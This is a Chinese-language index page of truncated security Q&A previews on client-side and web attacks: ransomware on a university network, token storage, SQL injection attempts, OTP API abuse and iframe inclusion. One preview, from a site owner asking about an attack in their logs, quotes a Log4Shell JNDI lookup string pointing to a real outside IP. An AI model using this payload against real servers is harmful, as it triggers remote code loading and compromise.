网络被黑 - 我是否受到影响
作者:cerv21 提问时间:2/23/2023
我所在的整个大学网络都被黑客入侵,几台计算机受到影响。在这些计算机上,文件是加密的。 但是,大多数受影响的计算机都运行Windows,而我运行的是Arch Linux。 有没有办法检查我的电脑是否受...
客户端攻击 问答列表
客户端保护令牌漏洞循环困境
作者:sabri mahmoud 提问时间:10/26/2023
很抱歉,这个问题需要很长,以便您可以理解问题,并且它绝对是相对于我的问题的大小而言的,我正在寻求网络安全专家的意见,因此感谢您提前抽出时间。 I) 背景 在Google Analytics的相同上...
从服务器端重定向浏览器
作者:Agustin Nuñez 提问时间:10/6/2023
在我基于 Vue + Nuxt 2 构建的页面中,我试图执行从一个页面到另一个页面的重定向,以防不允许用户看到该页面。 现在,为了实现这一点,我调用了一个端点,并依靠其响应来管理重定向,特别是在键“...
网站攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}
作者:Robert Benedetto 提问时间:10/5/2023
似乎有人试图攻击我的网站。我在博客中看到以下内容受到攻击:${jndi:ldap:/93.95.216.134:1389/Exploit} 似乎来自香港。 我的网站只是抛出 400 个错误,所以它...
阻止 https://example.com/livewire/message/xyz 外部访问
作者:Lorenzo Lorini Kalil 提问时间:9/23/2023
我有一个使用 livewire 的 Web 应用程序,在过去的几周里,我不得不在 Livewire 使用的消息路由上处理大量 SQL 注入尝试。我的问题是:有没有办法防止这种情况发生,我有一个防火墙,...
Localhost JavaScript 捆绑包正在尝试被用户注入我的网站。(由 Sentry 报告,一个错误和性能跟踪工具)
作者:Ela 提问时间:12/30/2021
我在哨兵报告中可以看到, 与我的供应商一起~main-6319dfea084cb55e85bf.js,main-6319dfea084cb55e85bf.js以及其他resource.scripts和...
为什么客户端劫持仅在浏览器在线时有效?
作者:Tyrannogina 提问时间:9/6/2023
我正在阅读基于浏览器的应用程序的 OAuth 2.0 草案,并进入了邮件列表的讨论。在电子邮件中,有这样一段文字: 声明使用被盗令牌与通过 用户浏览器中受损的客户端(客户端劫持)是 绝对错误。以下是...
将访问令牌和刷新令牌保存到本地存储但已加密?
作者:asallan3 提问时间:2/1/2023
我一直在研究使用 ReactJS 进行前端开发,并使用 ASP.NET Core 进行后端开发,作为第一步,我一直在开发身份验证/授权(登录)系统。 我实现了在 1 小时后过期的访问令牌和在 7 天...
在用户通过身份验证之前停止 API 滥用
作者:Thoughtful Monkey 提问时间:8/18/2022
我们有一个 Android 应用程序。用户需要使用基于短信的OTP登录,然后才能使用应用程序。 我们对 OTP 的请求是公共 API。攻击者已开始滥用此 API。与实际用户相比,API 调用次数增加...
避免包含远程网站
作者:Fabio B. 提问时间:9/4/2017
我最近看到了一些恶意域,包括我的网站页面。 我最初怀疑包含 iframe,但我已经在我的 httpd.conf 中进行了配置。Header always set X-Frame-Options SA...